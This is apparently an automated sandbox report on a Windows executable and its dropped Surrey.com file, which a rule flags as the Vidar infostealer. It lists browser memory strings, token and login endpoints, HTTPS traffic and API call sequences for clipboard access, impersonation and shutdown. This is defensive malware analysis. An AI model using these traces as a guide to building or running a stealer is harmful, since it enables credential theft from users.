Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000013.00000002.2829434480.0000203401E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000013.00000002.2812632110.0000203400044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2824592418.0000203401124000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000013.00000002.2812912427.00002034000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2820952797.0000203400D81000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2734333055.0000203400734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2822367999.0000203400E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000013.00000002.2815061486.00002034004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000018.00000003.2879923629.00004D9402488000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.2879645585.00004D9402484000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000013.00000003.2736084867.0000203400FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818005553.000020340098F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000013.00000003.2739414948.0000203400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739566795.000020340113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2739699547.000020340120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_377.21.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000013.00000002.2817962065.0000203400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2818005553.000020340098F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000013.00000003.2757891406.000020340174C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000013.00000002.2812753636.000020340008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000013.00000002.2812849232.00002034000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000013.00000002.2813579578.00002034001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49921
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49945 version: TLS 1.2
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 13_2_009BF7C7
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 13_2_009BF55C
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 13_2_009D9FD2

System Summary

Source: 13.2.Surrey.com.43e0000.2.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle, 13_2_009B4763
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 13_2_009A1B4D
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 13_2_009AF20D
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\HonoluluSyndrome
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\OxfordPrintable
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\ViBases
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\ImmediatelyBros
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\TransferRare
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\EscortsNascar
Source: C:\Users\user\Desktop\25xTHcaF7V.exe File created: C:\Windows\NavyPromising
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00968017 13_2_00968017
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0094E1F0 13_2_0094E1F0
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095E144 13_2_0095E144
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009622A2 13_2_009622A2
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009422AD 13_2_009422AD
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097A26E 13_2_0097A26E
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095C624 13_2_0095C624
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009CC8A4 13_2_009CC8A4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097E87F 13_2_0097E87F
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00976ADE 13_2_00976ADE
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B2A05 13_2_009B2A05
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009A8BFF 13_2_009A8BFF
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0095CD7A 13_2_0095CD7A
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0096CE10 13_2_0096CE10
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00977159 13_2_00977159
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00949240 13_2_00949240
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009D5311 13_2_009D5311
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009496E0 13_2_009496E0
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961704 13_2_00961704
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961A76 13_2_00961A76
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00967B8B 13_2_00967B8B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00949B60 13_2_00949B60
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00967DBA 13_2_00967DBA
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961D20 13_2_00961D20
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_00961FE7 13_2_00961FE7
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: String function: 0095FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: String function: 00960DA0 appears 46 times
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: String function: 004062A3 appears 58 times
Source: 25xTHcaF7V.exe Static PE information: invalid certificate
Source: 25xTHcaF7V.exe, 00000000.00000003.2354612974.0000000000732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 25xTHcaF7V.exe
Source: 25xTHcaF7V.exe, 00000000.00000002.2356614471.0000000000732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs 25xTHcaF7V.exe
Source: 25xTHcaF7V.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
